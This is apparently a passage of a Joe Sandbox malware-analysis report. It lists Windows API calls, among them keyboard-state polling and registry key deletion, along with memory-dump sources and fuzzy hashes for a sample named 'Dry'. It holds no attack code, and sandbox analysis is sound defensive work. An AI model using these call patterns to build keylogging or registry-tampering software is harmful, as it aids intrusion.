                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                                    • Opcode ID: 32480140b8a3bc7bc3972295f5636bddcd0190f50195baa4e21cf1ce9fc0dc54
                                                                                                                                                                                                                                                                                    • Instruction ID: ac4afced331e72e0c3a89d097bca9cea126b9c6e6f44196dc7847fd5878b1d4e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32480140b8a3bc7bc3972295f5636bddcd0190f50195baa4e21cf1ce9fc0dc54
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2361D2B5D00219AFCF04CFA8D884EAEBBF5FF48710F208569E559A7250D775AA41CF90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00B7A990
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00B7A9A7
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00B7A9B3
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00B7A9C9
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00B7AC15
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B7AC33
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B7AC54
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00B7AC73
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00B7AC95
                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?), ref: 00B7ACBB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                    • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                                    • Opcode ID: 7a53c0cdab8e3e6d8e91163ee45b851dfe3f301672ee83b367a26eb6102588c1
                                                                                                                                                                                                                                                                                    • Instruction ID: 270b369b4b29e782b84bb9737ba770380e8e20e84f4d7aa89cc3c15cd38d51dd
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a53c0cdab8e3e6d8e91163ee45b851dfe3f301672ee83b367a26eb6102588c1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29B16731600219EBDF55CF68C9857AE7BF2FF84700F18C0A9ED59AB295DB70A980CB51
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00B452E6
                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00B45328
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B45339
                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00B45345
                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00B4537A
                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00B453B2
                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00B453EB
                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00B45445
                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00B45477
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B454EF
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                                    • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                                    • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                                    • Opcode ID: fcba4434af34d3059af704f6cc409f60af70257d7d734fc3a4fa529e226b7846
                                                                                                                                                                                                                                                                                    • Instruction ID: 0574a5805fcc0501c377ac0769e8a75550c8b1f244fde755b8d28a467a05f8f5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcba4434af34d3059af704f6cc409f60af70257d7d734fc3a4fa529e226b7846
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9591CE71104F06AFD728DF24C984BAAB7F9FF10340F004599FA8A82192EB31EE55DB91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00AE24B0
                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B797B6
                                                                                                                                                                                                                                                                                    • GetFocus.USER32 ref: 00B797C6
                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00B797D1
                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00B79879
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B7992B
                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00B79948
                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00B79958
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B7998A
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B799CC
                                                                                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B799FD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                    • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                                    • Opcode ID: e129dc36913d9f67505ff7f46deacca7cef77b6c9167632249cc7207b3fcec9f
                                                                                                                                                                                                                                                                                    • Instruction ID: 75c76f803fdb660dd24228a8f9e78af75e61a135393037d46de6eef33e604e55
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e129dc36913d9f67505ff7f46deacca7cef77b6c9167632249cc7207b3fcec9f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D281C3715083019FE710CF25C885A6B7BE8FF89354F00899DF9ADA7291DB70D905CBA2
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00BB29C0,000000FF,00000000,00000030), ref: 00B4C973
                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(00BB29C0,00000004,00000000,00000030), ref: 00B4C9A8
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00B4C9BA
                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00B4CA00
                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00B4CA1D
                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00B4CA49
                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00B4CA90
                                                                                                                                                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B4CAD6
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B4CAEB
                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B4CB0C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                    • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                                    • Opcode ID: 3385d99d0f02acbc94957fb17cea1000a9218f712a6f5a4554dde0d094bce235
                                                                                                                                                                                                                                                                                    • Instruction ID: c94d4272d5d58630f7e963da2ade555faa632ec2248cfbcd0252c730822cb29c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3385d99d0f02acbc94957fb17cea1000a9218f712a6f5a4554dde0d094bce235
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96619B70A02249AFDF51CF64C889AFE7FF8FB05788F040195E911A3291DB30AE40EB61
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B4E4D4
                                                                                                                                                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B4E4FA
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B4E504
                                                                                                                                                                                                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00B4E554
                                                                                                                                                                                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B4E570
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                    • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                                    • Opcode ID: 9a1fbed216260290908bfb1088b78e98e58f09f27261c937bcd7db36825467f8
                                                                                                                                                                                                                                                                                    • Instruction ID: 20eec9f4eeac8ea9b9975c294480c4d5a0dd59cd25a04feba06819469d7b8e3c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a1fbed216260290908bfb1088b78e98e58f09f27261c937bcd7db36825467f8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA41F2726482047AEB05AB648C47EBF7BECEF65750F0040E9F904B60D2EF74DA01A6A5
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B6D6C4
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00B6D6ED
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B6D7A8
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00B6D70A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00B6D71D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B6D72F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B6D765
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B6D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B6D788
                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00B6D753
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                    • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                    • Opcode ID: 1592c09bc53060397380c3071248ff0d18fa2d1fa611a6077d4960e22edfe265
                                                                                                                                                                                                                                                                                    • Instruction ID: 0d26ee9dbaec06c50ce16d05ecc001fed9b08837b69b903031478596d7de6dcc
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1592c09bc53060397380c3071248ff0d18fa2d1fa611a6077d4960e22edfe265
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4317272E01129BBD7219B50DC88EFFBBBCEF46750F0001A5F905E3150DB789E459AA1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • timeGetTime.WINMM ref: 00B4EFCB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AFF215: timeGetTime.WINMM(?,?,00B4EFEB), ref: 00AFF219
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00B4EFF8
                                                                                                                                                                                                                                                                                    • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00B4F01C
                                                                                                                                                                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B4F03E
                                                                                                                                                                                                                                                                                    • SetActiveWindow.USER32 ref: 00B4F05D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B4F06B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B4F08A
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00B4F095
                                                                                                                                                                                                                                                                                    • IsWindow.USER32 ref: 00B4F0A1
                                                                                                                                                                                                                                                                                    • EndDialog.USER32(00000000), ref: 00B4F0B2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                                                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                    • Opcode ID: 89ba0719cd4d7e2d3ac07d6eb287965253911371aa5c2047a1dd8eb82ffd1717
                                                                                                                                                                                                                                                                                    • Instruction ID: 5a6504429d109b16c5e452ee5fecb2cf131c0757b70898350714e80df1a67098
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89ba0719cd4d7e2d3ac07d6eb287965253911371aa5c2047a1dd8eb82ffd1717
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6218171504205BFE7116F60EC89B267BFAFB99B95B000165F50A93372CFB18E84A661
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B4F374
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B4F38A
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B4F39B
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B4F3AD
                                                                                                                                                                                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B4F3BE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                    • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                    • Opcode ID: e276f54b840517c6657d026072698d09bac40e18abfa49e91d675c6029365243
                                                                                                                                                                                                                                                                                    • Instruction ID: 2bee9344836b68c18b364275bc55c94d6836e0e36d0af94cc637b337ea318714
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e276f54b840517c6657d026072698d09bac40e18abfa49e91d675c6029365243
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D118632AD819979D720A766CC4AEFF6AFCEFD2B40F4004AA7401E30E1DEA05E45C5B1
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00B4A9D9
                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00B4AA44
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00B4AA64
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00B4AA7B
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00B4AAAA
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00B4AABB
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00B4AAE7
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00B4AAF5
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00B4AB1E
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00B4AB2C
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00B4AB55
                                                                                                                                                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00B4AB63
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                    • Opcode ID: cf9032694fcc8f3cbe448bda3773152f7f9077c65093340d79fed5735fd67337
                                                                                                                                                                                                                                                                                    • Instruction ID: 2388c3399d550765c463d108fa1b4e6a7c1fa3d27ca5c96bff4f04e29c99f23c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf9032694fcc8f3cbe448bda3773152f7f9077c65093340d79fed5735fd67337
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E51C460A4478429FB35D7A48950BEABFF5DF11380F0845DDC5C25B1C2DA649B8CD763
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00B46649
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00B46662
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B466C0
